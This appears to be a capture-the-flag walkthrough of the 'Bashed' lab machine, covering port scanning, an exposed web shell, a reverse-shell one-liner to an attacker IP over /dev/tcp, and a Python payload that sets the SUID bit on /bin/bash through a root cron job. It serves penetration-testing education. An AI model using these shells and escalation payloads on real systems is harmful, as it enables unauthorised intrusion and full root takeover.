Bashed

Enumeration
As usual, we start with an nmap scan in order to find the open ports on the target machine.
The following nmap command scans the whole port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts
-sS: TCP SYN scan. This scan type is relatively unobtrusive and stealthy, since it never completes the TCP handshake.
--min-rate 5000: nmap tries to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: "insane" mode, the fastest of nmap's timing templates.
-Pn: skip host discovery and assume the host is online.
-n: no reverse DNS resolution.
-oN: save the scan result in normal format to a file, in this case allPorts.
As we can see, only port 80 (HTTP) is open. Let's try to obtain more information about the service and version running on that port.
nmap -sC -sV -p80 10.10.10.68 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable service/version detection.
-oN: save the scan result to a file, in this case targeted.
Let's take a look at the website.

There isn't much going on. Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir: directory/file enumeration mode.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200.
Exploitation
If we take a look at the /dev directory, we should see a few PHP files.

Opening phpbash.php drops us straight into a web shell that runs commands as the web server user.

Let's get a reverse shell. First, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: the port to listen on.
Then, in the web shell, we run the following to get a reverse shell as www-data and grab the user flag. Replace 10.0.0.1 with our own attacking IP; the port must match the listener we just started, and the & characters are URL-encoded as %26 so the browser does not treat them as query-string separators.
bash -c "bash -i >%26 /dev/tcp/10.0.0.1/4444 0>%261"
Privilege Escalation
Let's start the privilege escalation phase by listing the sudo privileges of the www-data user.
sudo -l
-l: list the sudo privileges of the current user.
We can run any command as the scriptmanager user, so let's get a shell as that user.
sudo -u scriptmanager bash
If we look for files owned by scriptmanager, we find test.py in the /scripts folder. Listing that folder also shows a second file, test.txt, which is owned by root.
ls -l /scripts
Let's see the content of the test.py and test.txt file.
cat /scripts/test.py
cat /scripts/test.txt
test.txt is owned by root while test.py is owned by scriptmanager, so some scheduled task (a cron job) running as root must be executing test.py. The idea is to replace the contents of /scripts/test.py with code that sets the SUID bit on /bin/bash: when root's cron job runs the script, the chmod happens with root's privileges and bash becomes a setuid-root binary.
nano /scripts/test.py
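As an added example (not the contents of the box's own test.py, which the write-up does not reproduce), the following Python script is one payload that could be written into /scripts/test.py. The target path /bin/bash and the helper names are our own choices; everything else is standard library. It preserves the existing permission bits and only adds the setuid bit, and it reports whether the bit ended up set:

```python
#!/usr/bin/env python3
# Added example payload for /scripts/test.py (not the script shipped on the box).
# The root cron job runs this file, so the os.chmod below executes as root and
# leaves /bin/bash with the setuid bit set.
import os
import stat
import sys

# Assumed target: the binary the write-up makes SUID. Any root-owned binary
# that honours the setuid bit would do.
TARGET = "/bin/bash"


def suid_mode(st_mode):
    """Return the permission bits of st_mode with the setuid bit added.

    The other bits are preserved, so a 0755 /bin/bash becomes 4755.
    """
    return stat.S_IMODE(st_mode) | stat.S_ISUID


def is_suid(path):
    """True if path currently carries the setuid bit."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def make_suid(path):
    """Set the setuid bit on path, keeping its other permission bits.

    chmod only succeeds for the file's owner (or root), which is why this has
    to be run by the root cron job rather than by scriptmanager directly.
    Returns True if the bit is set afterwards.
    """
    current = os.stat(path).st_mode
    os.chmod(path, suid_mode(current))
    return is_suid(path)


if __name__ == "__main__":
    # Optional argument: a different target, e.g. a file we own, to test harmlessly.
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET
    try:
        done = make_suid(target)
    except PermissionError:
        # Expected when run as scriptmanager; the cron job running as root succeeds.
        print(f"{target}: permission denied as uid {os.geteuid()}, waiting for root's cron")
        sys.exit(1)
    print(f"{target}: setuid {'set' if done else 'not set'} (uid {os.geteuid()})")
```

Run by hand as scriptmanager it fails with permission denied, since only root may chmod /bin/bash; the change takes effect the next time the cron job runs the script as root. To check the logic first, pass a file we own as the argument and confirm with ls -l that the owner's execute bit shows as s.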
Now all we have to do is wait for the cron job to run and check that /bin/bash has picked up the SUID bit (the owner's execute bit shows as s, i.e. -rwsr-xr-x).
ls -l /bin/bash
Finally, we run bash with -p so that it keeps the effective uid of root (without -p, bash drops its effective uid back to our real uid on startup). That gives us a root shell, and we can read the root flag.
bash -p